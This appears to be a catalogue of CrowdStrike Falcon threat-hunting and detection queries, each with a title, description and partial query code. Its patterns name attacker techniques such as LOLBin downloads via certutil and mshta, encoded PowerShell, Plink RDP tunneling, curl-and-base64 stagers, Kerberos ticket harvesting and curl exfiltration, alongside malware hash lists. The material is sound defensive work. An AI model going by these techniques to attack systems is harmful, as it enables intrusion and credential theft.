#event_simpleName=InstalledBrowserExtension BrowserExtensionId!="no-extension-available"

// Aggregate by event_platform, BrowserName, ExtensionID and ExtensionName

EDRhuntingintermediate

Installed Browser Extensions (Hunt Extension Name)

This query will output a table with all installed browser extensions.

// Get browser extension event
#event_simpleName=InstalledBrowserExtension BrowserExtensionId!="no-extension-available"

// Look for string "vpn" in extension name

EDRhuntingintermediate

InstallFix on macOS

The InstallFix query is designed to catch the execution patterns of one-liner stagers or initial access scripts that often masquerade as legitimate system fixes or installers through a high-confidence sequence where a curl command - configured with flags typically used to bypass security or silence output - is executed in close temporal proximity (within 1 minute) to a command involving Base64 decoding.

#repo="base_sensor"
| #event_simpleName="ProcessRollup2"
| event_platform="Mac"
| correlate(

EDRdetectionintermediate

Inventory of Installed Browser Extensions Across Endpoints

The query lists installed browser (Chrome & Edge) extensions across endpoints, normalizes browser names, counts unique systems per extension, adds a Chrome Web Store link, and sorts results to highlight the most common extensions.

#event_simpleName=InstalledBrowserExtension BrowserExtensionId!="no-extension-available"
| groupBy([event_platform, BrowserName, BrowserExtensionId, BrowserExtensionName], function=([count(aid, distinct=true, as=TotalEndpoints)]))
| format("[See Extension](https://chromewebstore.google.com/detail/%s)", field=[BrowserExtensionId], as="Chrome Store Link")
| sort(order=desc, TotalEndpoints, limit=1000)

EDRhuntingintermediate

IOC search | PTC Windchill & FlexPLM vulnerability

This query checks for Indicators of Compromise (IOCs) related to a critical Remote Code Execution vulnerability in PTC Windchill and FlexPLM. The query tracks the creation or modification of specific Java source files that an attacker may use to intercept requests, manipulate data streaming, or execute unauthorized system updates. https://support.eacpds.com/hc/en-us/article_attachments/47430019070996

case{
  #event_simpleName = /.*FileWritten/i
  | FileName = /GW\.class/i or FileName = /Gen\.class/i or FileName = /dpr_.*\.jsp/i;
  #event_simpleName = /.*FileWritten/i

EDRhuntingintermediate

JAR files executed from %AppData%

This query detects if a JAR file was executed from the %AppData% folder

#event_simpleName=ProcessRollup2 
| ImageFileName=/javaw.exe/i CommandLine=/appdata/i
| table([aid, @timestamp, #event_simpleName, ImageFileName, SHA256HashData], limit=1000)

EDRhuntingintermediate

JAR files written to %AppData%

This query detects if a JAR file was written to the %AppData% folder

#event_simpleName=JarFileWritten 
| TargetFileName=/\\AppData\\/i
| table([aid, @timestamp, TargetFileName, SHA256HashData], limit=1000)

EDRhuntingintermediate

Lateral Movement via SMB

Detects lateral movement using SMB protocol by correlating process events with network connections on port 445.

FileName = "cmd.exe" OR FileName = "powershell.exe"
| join(
    { NetworkEvent
      | DestinationPort = 445

EDRlateral-movementsmbintermediate

LeakNet Campaign: Deno Runtime & Klist Suspicious Execution Detection

Detects indicators of the LeakNet campaign (analyzed by ReliaQuest, March 2026), which uses ClickFix a social engineering tactic where compromised websites display fake error dialogs that coerce users into manually pasting and executing a malicious PowerShell/CMD command. This delivers a portable Deno (JavaScript runtime) binary to user-writable directories that runs malicious payloads entirely in memory, avoiding disk-based detection. The query targets the post-delivery kill chain: Deno execution from AppData/Temp/ProgramData paths, klist.exe usage from interactive shells indicating Kerberos ticket harvesting, Deno spawning reconnaissance and living-off-the-land binaries, and dangerous Deno runtime flags or remote code fetch patterns. A noise reduction filter excludes Deno running from standard developer or Program Files paths.

#event_simpleName=ProcessRollup2
| (
    /* ── Clause 1: Deno launched from user-writable locations ── */
    (

EDRhuntingdetectionintermediate

List of attachments sent from Outlook

#event_simpleName=ProcessRollup2
| CommandLine=/content.outlook/i
| aid=?aid
| ImageFileName=/(\/|\\)(?<FileName>\w*\.?\w*)$/

EDRhuntingintermediate

LOLBin Certutil

This query detects the use of certutil.exe.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/certutil.exe/i and CommandLine=/(https?:)/i

EDRhuntingintermediate

LOLBin Mshta

This query detects the use of mshta.exe.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/mshta.exe/i
| CommandLine=/mshta(?:\.exe)?\"?\s+\"?(?<HtaPath>(?:.*?\.hta|(?=\").*?(?=\")|.*?(?=(?:\s|$))))/i
| HtaPath=/(?<HtaFolder>.*)(\\\\|\/)/i

EDRhuntingintermediate

LOLBin Msiexec

This query detects the use of Msiexec.exe.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/msiexec.exe/i and CommandLine=/http/i

EDRhuntingintermediate

LOLBin Regsvr32

This query detects the use of Regsvr32 when it has loaded scrobj.dll.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win
| ImageFileName=/regsvr32.exe/i CommandLine=/scrobj.dll/i CommandLine=/i:/i

EDRhuntingintermediate

LOLBin Rundll32

This query detects the use of Rundll32 from parents that are known for misuse.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/rundll32.exe/i
| in(ParentBaseFileName, values=["cmd.exe","winword.exe","powerpnt.exe","excel.exe","outlook.exe","mshta.exe","cscript.exe","wscript.exe"])

EDRhuntingintermediate

LOLBin WMIC

This query detects the use of WMIC.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/wmic.exe/i

EDRhuntingintermediate

Malicious Chrome Extension FreeVPN-One Detection

This Logic detects the presence of the malicious Chrome extension FreeVPN[.]One by identifying its unique extension ID across installed browsers. The logic further correlates this presence with network communications initiated by the extension to suspicious or untrusted domains. By combining extension enumeration with traffic analysis, the detection ensures high fidelity with minimal false positives. This layered approach strengthens visibility into malicious browser add-ons masquerading as VPN tools.

defineTable(query={#event_simpleName=InstalledBrowserExtension
|case{
    BrowserExtensionId=/jcbiifklmgnkppebelchllpdbnibihel/iF;
    BrowserExtensionName=/FreeVPN/iF

EDRhuntingintermediate

MongoDB Processes on Windows & Linux Hosts (CVE-2025-14847)

This query identifies Windows and Linux Hosts running MongoDB processes.

#event_simpleName=ProcessRollup2
| (event_platform=Win AND ImageFileName=/mongod\.exe|mongos\.exe/i) OR (event_platform=Lin AND ImageFileName=/mongod|mongos/i)
| table([@timestamp, aid, ComputerName, UserName, ImageFileName])

EDRhuntingintermediate

New API Keys within the Falcon Platform

This query provides a list of newly created API Keys, including relevant details such as Client Name and Client ID.

#event.dataset = falcon.cloud
| OperationName = CreateAPIClient
| user.id = *
| "Client Name" := rename(Attributes.name)

EDRmonitoringintermediate

New installed Sensors

This query loads host inventory data from aid_master_main.csv, enriches it with details from aid_master_details.csv, and outputs a cleaned, formatted table of host information.

readfile("aid_master_main.csv")
| test(FirstSeen > start())
| cid=?cid
| ProductType match {

EDRmonitoringintermediate

Notepad++ supply chain attack

This query detects a state-sponsored supply chain attack where the legitimate Notepad++ updater (gup.exe) is hijacked to download the Chrysalis backdoor. It identifies the attack by spotting unauthorized network connections from the updater, malicious DLL side-loading (e.g., BluetoothService.exe loading log.dll), and data exfiltration commands involving curl and temp.sh.

|case{
#event_simpleName=/DNS/iF ContextBaseFileName=/^gup\.exe$/iF DomainName!=/github.com|notepad-plus-plus.org|.globalsign.com|release-assets.githubusercontent.com/iF| DetectionLogic := "GUP beacon to C2C" | Indicator := DomainName | Risk := "HIGH";
in(field="SHA256HashData", values=["02368c6b62cb392dddd35cfc6cb8c1154f7ebdceb9fb559cefc301982d6fbbf9","0dcd846cdfdc793fab39a3c9860e0f6ab68cdbdcf4b03a87e8a02df0d3e1249f","5dd766a7a378c97eb8c9fe9a4bff678e3c9a05386911f4296e094407b99c23d2","6a7a8aa91109c25d57fe2ca71c150ca09afc1bf10c98376adf959dbc91010394","a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9","078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5","0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd","2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924","3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad","4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906","4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8","77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e","7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd","831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd","8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e","9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600","a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9","b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3","e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda","f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a","fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a"],ignoreCase=true)| DetectionLogic := "Malicious SHA256 Hash Execution" | Indicator := SHA256HashData | Risk := "HIGH";
in(field="SHA1HashData", values=["06a6a5a39193075734a32e0235bde0e979c27228","07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51","0d0f315fd8cf408a483f8e2dd1e69422629ed9fd","13179c8f19fbf3d8473c49983a199e6cb4f318f0","21a942273c14e4b9d3faa58e4de1fd4d5014a1ed","259cd3542dea998c57f67ffdd4543ab836e3d2a3","2a476cfb85fbf012fdbe63a37642c11afa5cf020","2ab0758dda4e71aee6f4c8e4c0265a796518f07d","3090ecf034337857f786084fb14e63354e271c5d","46654a7ad6bc809b623c51938954de48e27a5618","4c9aac447bf732acc97992290aa7a187b967ee2c","573549869e84544e3ef253bdba79851dcde4963a","6444dab57d93ce987c22da66b3706d5d7fc226da","73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf","7e0790226ea461bcc9ecd4be3c315ace41e1c122","813ace987a61af909c053607635489ee984534f4","821c0cafb2aab0f063ef7e313f64313fc81d46cd","8e6e505438c21f3d281e1cc257abdbf7223b7f5a","90e677d7ff5844407b9c073e3b7e896e078e11cd","94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8","9c0eff4deeb626730ad6a05c85eb138df48372ce","9c3ba38890ed984a25abb6a094b5dbf052f22fa7","9df6ecc47b192260826c247bf8d40384aa6e6fd6","9fbf2195dee991b1e5a727fd51391dcc2d7a4b16","bd4915b3597942d88f319740a9b803cc51585c4a","bf996a709835c0c16cce1015e6d44fc95e08a38a","c68d09dd50e357fd3de17a70b7724f8949441d77","ca4b6fe0c69472cd3d63b212eb805b7f65710d33","d0662eadbe5ba92acbd3485d8187112543bcfbf5","d7ffd7b588880cf61b603346a3557e7cce648c93","da39a3ee5e6b4b0d3255bfef95601890afd80709","defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c","f7910d943a013eede24ac89d6388c1b98f8b3717"],ignoreCase=true)| DetectionLogic := "Malicious SHA1 Hash Execution" | Indicator := SHA1HashData | Risk := "HIGH";

EDRhuntingintermediate

OS Platform ratio

This query aggregates SensorHeartbeat events by operating system platform to show the relative distribution of endpoints per OS. It is well suited for visualization as a pie chart, providing a quick overview of platform coverage and identifying imbalances or unexpected OS presence in the environment.

#event_simpleName = SensorHeartbeat
| groupBy(aid,event_platform)
| groupBy([event_platform])

EDRmonitoringintermediate

Phishing - List of links opened from Outlook

#event_simpleName=ProcessRollup2 
| aid=?aid ImageFileName=/\\outlook\.exe/i
| regex("(?<FileName>[^\\/|\\\\]*)$", field=ImageFileName, strict=false)
| join(

EDRhuntingintermediate

Powershell Command Length Anomaly Detection

This query establishes a 7-day baseline of average PowerShell command lengths for each host. It then compares this baseline to the average command length of the last 24 hours. The query identifies hosts with a significant percentage increase in command length, which can be an indicator for obfuscation, fileless execution, or other malicious activities associated with "Living off the Land" techniques.

#event_simpleName=ProcessRollup2
| ImageFileName=/\\(powershell(_ise)?|pwsh)\.exe/i
| CommandLength := length("CommandLine") | CommandLength>0
| aid=?AID

EDRdetectionintermediate

Powershell Downloads

This query detects powershell downloads using `Start-BitsTransfer`, `Invoke-WebRequest`, or `System.Net.WebClient`.

#event_simpleName=CommandHistory
| CommandHistory=/Invoke\-WebRequest|Net\.WebClient|Start\-BitsTransfer/i
| regex("(?<URL>https?://[^'\"]+)", field=CommandHistory)
| replace("https://", with="", field=URL, as=ShortURL)

EDRhuntingintermediate

Rare Remote Ports in Network Connections

The query analyzes IPv4 network connection events, counts occurrences per remote port, calculates their percentage of total connections, and lists only ports representing less than 10% of the traffic.

#event_simpleName=NetworkConnectIP4
| groupBy([RemotePort], function=count(as=count), limit=max) 
| [sum(count, as=total), sort(field=RemotePort, order=ascending, limit=20000)] 
| percent := 100 * (count / total)

EDRhuntingintermediate

Rare windows shell parent process

This hunting query is designed to detect rare shell parent processes.

#event_simpleName=ProcessRollup2 event_platform=Win
| case { in(field=FileName, values=["powershell.exe", "cmd.exe", "pwsh.exe"]) | IsChild := "1"; * | IsChild := "0" }
| case { IsChild = "1" | ProcId := ParentProcessId | ChildProcess := FileName | ChildCommandLine := CommandLine;
IsChild = "0" | ProcId := TargetProcessId | ParentCommandLine := CommandLine | ParentFileName := FileName | ParentFilePath := FilePath | ParentSHA256HashData := SHA256HashData; }

EDRhuntingintermediate

Recent RTR Sessions

List of the recent Real Time Response sessions that were started.

// Get RTR Start events
#repo=detections #event_simpleName=Event_RemoteResponseSessionStartEvent

// Rename Agent ID value

EDRmonitoringintermediate

Remediation - Host Contained

This query lists all isolated devices and identifies who initiated the isolation.

#repo=detections EventType = "Event_ExternalApiEvent" ExternalApiType = "Event_UserActivityAuditEvent" OperationName=containment_requested cid=?{cid="*"}
| rename(field=AgentIdString,as=aid)
| join({
$falcon/investigate:aid_base()

EDRmonitoringintermediate

Remote Interactive Logons (RDP)

Identifies remote interactive logons on a specific endpoint. The query filters UserIdentity events for LogonType=10, which typically indicates Remote Desktop or similar remote access sessions. Results are scoped by the provided aid and display up to 1,000 events, including timestamp, username, user principal, and the logon server. Useful for detecting and reviewing remote access activity during investigations or routine monitoring.

#event_simpleName=UserIdentity
| aid=?aid LogonType=10
|table([@timestamp,UserName,UserPrincipal,LogonServer],limit=1000)

EDRhuntingintermediate

Remote Port Forwarding via Plink - Unauthorized RDP Tunneling Detection

Detects the use of Plink (PuTTY Link) to establish remote port forwarding tunnels, specifically targeting traffic redirected to port 3389 (RDP). This technique is frequently used by threat actors for lateral movement or to bypass firewall restrictions by tunneling RDP over SSH.

#event_simpleName=ProcessRollup2
| ImageFileName=/\\plink(64)?\.exe$/i
| CommandLine=/\s-(R|L).*:3389/i
| table([aid, ComputerName, UserName, ImageFileName, CommandLine, ParentBaseFileName])

EDRhuntingintermediate

ROKRAT Malware APT 37

RoKRAT Malware – Injection & Steganography 🛠 High‑Level TTPs - Initial Access: Malicious .lnk files within compressed archives. - Execution & Persistence: PowerShell/BAT‑driven staged loaders with XOR decryption. Defense Evasion: Process injection into trusted Windows binaries & payload concealment via steganography. - Command & Control: Abuse of pCloud, Yandex Disk, and Dropbox APIs with embedded tokens to blend with legitimate traffic.

in(field="#event_simpleName", values=[*ProcessRollup2,DnsRequest,*Written])
|case{
    in(field="SHA256HashData", values=["3fa06c290c477c133ca58512c7852fc998632721f2dc3a0984f18fbe86451e18","ccb6ca4cb385db50dad2e3b7c68a90ddee62398edb0fd41afdb793287cfbe8e6","9eca7ab62e3ad40b79116ad713462e3ae4d9610345952e5dd279f0b481870d4f","7ee4326c5d0e6a30c1a9bdec045d670758fa1b36477992d61b03cb270113b196","e27467f7fdfa721e917384542ce10cc6108dfd78df14e23872cf8df916e0b8c6","7d514021c472e6e17f587ed30555d3f120653e6c7f8dc25d2331514b92ffd7bc","41d9b6d8cf0fff85bf35327d4b94db629cd9f754c487672911b7f701fe8c5539","6a2d984ef3fa0de9b9feb5f558381201e6dff42ef5efe4867fb24e47c6a2aade","bf7d5020dcd7777509b7b542255814cd61bfb1599d532dd2fdbb50de2ad70bc5","90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0","ca56720610400d6da773ffa4cce5b2447d4a665087604c9c6e1c9e71c048ccfc"],ignoreCase=true);
    in(field="DomainName", values=["*api.pcloud.com","*cloud-api.yandex.net","*dropboxapi.com"], ignoreCase=true);

EDRhuntingintermediate

Search for oldest devices

A query to get the age of devices that have the falcon sensor installed.

#event_simpleName = SensorHeartbeat
| in(field=event_platform, values=[?Platform])
| ComputerName like ?ComputerName
| aid = ?aid

EDRmonitoringintermediate

Sensor Version Adoption Trend

Visualizes the daily distribution of Sensor versions across the environment. It groups versions by Major and Minor releases (e.g., 6.45) to monitor the rollout of updates and identify legacy versions.

#event_simpleName=OsVersionInfo 
| AgentVersion=/(?<ShortAgentVersion>\d+\.\d+\.)/
| timeChart(ShortAgentVersion,span="1d")

EDRmonitoringintermediate

SOC Efficiency Metrics

Summarizes CrowdStrike Falcon detections across hosts, showing key lifecycle metrics such as tactic, technique, severity, detection state, and resolution time. Useful for SOC performance tracking, identifying detection patterns, and monitoring time-to-close for incidents.

// Get events of interest
#repo=detections 
| in(field="ExternalApiType", values=[Event_UserActivityAuditEvent, Event_EppDetectionSummaryEvent])

EDRmonitoringintermediate

Suspicious PowerShell Execution

This query identifies suspicious PowerShell execution patterns, including encoded commands and unusual parent processes, which could indicate malicious activity.

#event_simpleName=ProcessRollup2 ImageFileName=/\\powershell\\.exe/i
| CommandLine=/\s-[eE^]{1,2}[nN][cC][oO][dD][eE][mM][aA][nN][dD^]+\s/i
| join({#event_simpleName=UserIdentity}, field=AuthenticationID, include=[UserName])
| table([aid, UserName, ParentImageFileName, ImageFileName, CommandLine])

EDRhuntingintermediate

Suspicious Registry Modifications

This query detects suspicious registry modifications that could indicate persistence mechanisms or system configuration tampering by attackers.

#event_simpleName=RegGenericValue 
| RegObjectName=/\\(Run|RunOnce|Winlogon|AppInit_DLLs|Image File Execution Options)/i
| RegValueName!=/^(ctfmon|SecurityHealth|OneDrive)$/i
| join({#event_simpleName=UserIdentity}, field=AuthenticationID, include=[UserName])

EDRhuntingintermediate

Systems Initiating Connections to a High Number of Ports

Detects hosts that establish network connections across a large number of unique ports within a given period. This behavior may indicate port scanning, network reconnaissance, or potentially malicious enumeration activity originating from a compromised host or unauthorized tool. The query aggregates by host and process, listing associated filenames, command lines, and user context to assist with triage.

#event_simpleName=/^(NetworkConnectIP4|ProcessRollup2)$/
| falconPID:=TargetProcessId | falconPID:=ContextProcessId
| UserID:=UserSid | UserID:=UID
| selfJoinFilter(field=[aid, falconPID], where=[{#event_simpleName=NetworkConnectIP4}, {#event_simpleName=ProcessRollup2}])

EDRhuntingintermediate

User Logoff Activity

Table of all UserLogoff events including UserName, ComputerName, aip, LocalIP and Domain.

#event_simpleName=UserLogoff
| groupBy([UserName, name, aid, aip, ComputerName, event_platform, LocalIP, LogonDomain, LogonServer, LogonType], function=[count(@timestamp), selectLast([@timestamp])])
| table([@timestamp, UserName, ComputerName, aid, aip, event_platform, LocalIP, LogonDomain, LogonType], limit=20000)

EDRmonitoringintermediate

User Logon Activity

Table of all user logons.

#event_simpleName=UserLogon
| groupBy([UserName, name, aid, aip, ComputerName, event_platform, LocalIP, LogonDomain, LogonServer, LogonType], function=[count(@timestamp), selectLast([@timestamp])])
| table([@timestamp, UserName, ComputerName, aid, aip, event_platform, LocalIP, LogonDomain, LogonType], limit=20000)

EDRmonitoringintermediate

User Logon Details (Time, Type, Location, Last Password Change)

This query will output a table including recent user logons with context information: - Timestamp - UserName - SID - LogonType - UserIsAdmin (Y/N) - PasswordLastSet - Location

#event_simpleName=UserLogon UserSid=S-1-5-21-*
| in(LogonType, values=["2","10"])
| ipLocation(aip)
| case {UserIsAdmin = "1" | UserIsAdmin := "Yes" ;

EDRhuntingmonitoringintermediate

Users creating Network Shares

The Query shows all new created Network Shares.

#event_simpleName="NetShareAdd"
| wildcard(field=UserName, pattern=?UserName, ignoreCase=true)
| wildcard(field=ComputerName, pattern=?ComputerName, ignoreCase=true)
| groupBy([ComputerName, UserName, ShareName, SharePath, ShareData, @timestamp])

EDRhuntingintermediate

Windows Store Installs

This query displays all applications installed from the Microsoft Store on a machine. It extracts the package name from the file path and groups the results by computer name and package base. Also features the ability to filter out known good file paths and packages to reduce noise in the results.

| regex("WindowsApps\\\\(?<PackageName>[^\\\\]+)\\\\", field=FilePath, strict=true)
| regex("^(?<PackageBase>[^_]+)", field=PackageName, strict=false)
| ComputerName=~wildcard(?ComputerName, ignoreCase=true)
| PackageBase=~wildcard(?PackageBase, ignoreCase=true)

EDRmonitoringintermediate